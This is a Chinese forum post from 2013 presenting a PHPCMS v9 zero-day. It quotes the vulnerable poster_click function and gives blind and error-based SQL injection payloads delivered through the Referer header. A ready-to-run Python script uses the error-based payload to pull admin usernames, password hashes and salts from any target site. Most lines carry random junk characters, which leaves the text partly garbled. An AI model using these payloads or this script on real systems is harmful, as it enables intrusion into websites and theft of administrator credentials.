有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:& V( y" ?, d- z6 _; B, _ _
3 p$ l8 d# _9 [ @" P( M/ h) [* v
问题函数\phpcms\modules\poster\index.php. s+ C; i, w$ W. r0 e( n
( i: E, e* N! ^: B3 C1 apublic function poster_click() {/ c4 N) K, _0 X7 Q4 C B+ r
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 y& k, W( n2 s% C$r = $this->db->get_one(array('id'=>$id));
' ?. k$ {' Y* f8 wif (!is_array($r) && empty($r)) return false;) o/ G+ J) ?- `7 `; Q, ]
$ip_area = pc_base::load_sys_class('ip_area');
9 W* [( ?: _2 ~$ip = ip();
# j. U; H8 C0 Q5 \$ a0 ]$area = $ip_area->get($ip);. x; i. j* M% F1 v! r
$username = param::get_cookie('username') ? param::get_cookie('username') : '';7 }" G0 u$ F3 M+ m
if($id) {
8 E$ M$ r: E0 m6 y$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
9 l1 W' | W6 T' c/ H6 w$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));6 u- e- I9 q: f
}
3 H" r7 f5 h+ Q; i" E$ t3 ^. H; H$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));" t! T9 L9 d- c- T J5 }
$setting = string2array($r['setting']);
, A" M9 K* a% l% o$ q2 Mif (count($setting)==1) {
5 ^6 {, a: X5 d3 X( P2 a r$url = $setting['1']['linkurl'];
8 H# p5 r% l" q. \} else {2 ^' _0 p* k$ t
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
/ q' b! d) {( h6 v4 ]* O7 s}# E- u: |, M0 e a. a% B
header('Location: '.$url);2 |$ r( s1 T, u) ^9 m1 n+ D- E( a
}) u! a% j) F* O- G$ l, d' d/ g
$ \% M* P9 W3 r
! {9 A3 s) l, L& l: P/ f
- k3 T4 u3 o1 n- M
利用方式:
* h, O. I- y Q: G O
* |: l0 Q( S1 u6 T7 t( s, }4 w5 W1、可以采用盲注入的手法:
' j$ k) z5 {& [+ v
, _6 Y, S: f, S# `" P* w! y0 p; lreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
. J2 Z! }) f, n) I9 f- k Q2 Q7 g; v: I' X4 m
通过返回页面,正常与否一个个猜解密码字段。
* u* f7 K( U! l* B4 ^5 k2 d5 a9 d! P4 {$ u" P$ S
2、代码是花开写的,随手附上了:! d- |3 {" @* H' N; o3 \1 P
% t0 D$ H7 n4 {
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
! n9 \& X$ ]! |# x3 z' l
( f. n* V7 ~# A# Y U此方法是爆错注入手法,原理自查。
. k, I8 T4 [0 ^# Z. j8 ^2 { d5 ]- y0 _7 |. F5 M' W- @* z8 e, }
7 p X4 a4 C6 Y, u0 F
$ K0 C9 R% f+ w d& j/ z# [& s利用程序:# `/ v8 c8 g1 @! S% R/ K6 L. k
: Q1 Q) j# C- ?3 F
#!/usr/bin/env python
5 Z% k) y8 ~% Y7 \; [import httplib,sys,re1 e- V# ~) s' L9 V5 \- V
# h8 y/ G* Y$ `
def attack():$ X4 d$ D+ o! R2 U8 O
print “Code by Pax.Mac Team conqu3r!”
" f9 d5 H O7 `: R7 _' U' Oprint “Welcome to our zone!!!”) P# L' V5 ` e
url=sys.argv[1]
/ a. b' q8 U# }! q' ?# ?$ b, X( Spaths=sys.argv[2]& G* D6 ^: l8 ~$ J' {" q
conn = httplib.HTTPConnection(url)
8 g m" Q% d; L. E$ Yi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,0 c1 o9 u5 I2 x& z4 I R
“Accept”: “text/plain”,
/ F" k* x. T3 i“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}9 `: o" W9 q2 F1 x5 [5 [0 k
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
3 u# A+ d1 P6 q5 @0 @7 `r1 = conn.getresponse()
: f/ f/ @2 O+ k7 z: a) rdatas=r1.read()
5 i" Q( x: M' r# y. sdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
0 t3 Z4 \# Y& E* t; Pprint datas[0]- r/ @2 u! E, f0 Q# W |6 z5 Q* ?* l
conn.close()! Z! n* z: m9 l9 v- |4 B
if __name__==”__main__”:; s9 @4 H$ p3 J8 b
if len(sys.argv)<3:' `0 @ |+ [( T
print “Code by Pax.Mac Team conqu3r”
6 k8 g) |: j8 Q! \print “Usgae:”
' S2 K, \) \+ C/ a. a+ `: lprint “ phpcmsattack.py www.paxmac.org /”
8 l. L$ M- O- T/ ?$ Y" \% Vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”/ [ c' X1 ?* c* X' w. j" \9 n: O
sys.exit(1)# P1 N# r9 E" A0 }0 s
attack()
) j1 |( Y( {6 b! X! G m# M8 x9 ^; T2 K; F! R
|
发表于 2013-1-11 21:01:00
收藏
支持
反对